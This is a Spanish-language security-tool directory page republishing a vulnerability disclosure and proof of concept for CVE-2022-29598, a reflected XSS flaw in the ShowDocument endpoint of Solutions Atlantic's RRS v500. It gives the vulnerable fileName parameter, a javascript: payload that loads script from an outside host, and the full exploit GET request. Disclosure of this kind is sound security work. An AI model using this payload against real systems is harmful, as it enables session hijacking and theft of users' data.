Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-29598 — La aplicación RRS v500 es vulnerable a una vulnerabilidad de Cross-Site Scripting (XSS) reflejado. | Kitploit
Herramientas/GitHubGitHub/thegetch/cve-2022-29598
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónSeguridad WebPruebas de Penetración
GitHubthegetch/cve-2022-29598

CVE-2022-29598

La aplicación RRS v500 es vulnerable a una vulnerabilidad de Cross-Site Scripting (XSS) reflejado.

Ver Repositorio
hace 4 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-29598 : Cross-Site Scripting (XSS) Reflejado en RSS v500

URL de Mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598

URL de NIST: https://nvd.nist.gov/vuln/detail/CVE-2022-29598

La aplicación RRS v500 de Solutions Atlantic es vulnerable a una vulnerabilidad de Cross-Site Scripting (XSS) reflejado. La explotación de una vulnerabilidad XSS podría permitir a un adversario hacerse pasar por el usuario víctima, divulgar datos sensibles o realizar acciones que el usuario víctima tiene permitido realizar.

Se encontró que el parámetro fileName acepta entrada del usuario y la refleja en la respuesta del servidor. Aunque se realizó cierto filtrado y saneamiento de la entrada del usuario antes de la reflexión, como la codificación de algunos caracteres especiales (símbolos mayor/menor que), dado que la reflexión ocurría en un contexto JavaScript, se podía inyectar código JavaScript en la respuesta del servidor, evadiendo las restricciones.

URL afectada:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

Carga útil XSS utilizada:

  • javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//

Prueba de Concepto (POC):

Funcionalidad de Mostrar Documento:

URL afectada:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

La aplicación tiene la capacidad de enlazar a sitios web externos. Al seleccionar un enlace al sitio externo, se realiza una solicitud a /RRSWeb/maint/ShowDocument/ShowDocument.aspx con dos parámetros: fileName, que contendrá la URL del sitio externo al que se redirigirá, y requestType, que tendrá el valor ExternalLink. Siempre que el parámetro requestType esté configurado con su valor predeterminado, cualquier cosa que el usuario introduzca en el parámetro fileName se reflejará en un contexto JavaScript, específicamente dentro de un window.location.href. Usando una carga útil XSS con una directiva JavaScript, puede ocurrir un ataque exitoso de XSS reflejado.

Solicitud GET con carga útil XSS:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0


Respuesta del servidor:

01_RRS_XSS_Response_JS_Directive

Renderizado en el navegador:

02_RRS_XSS_Rendered

Descubrimiento

Abril 2022

  • Eric Getchell - TheGetch
Descargar herramienta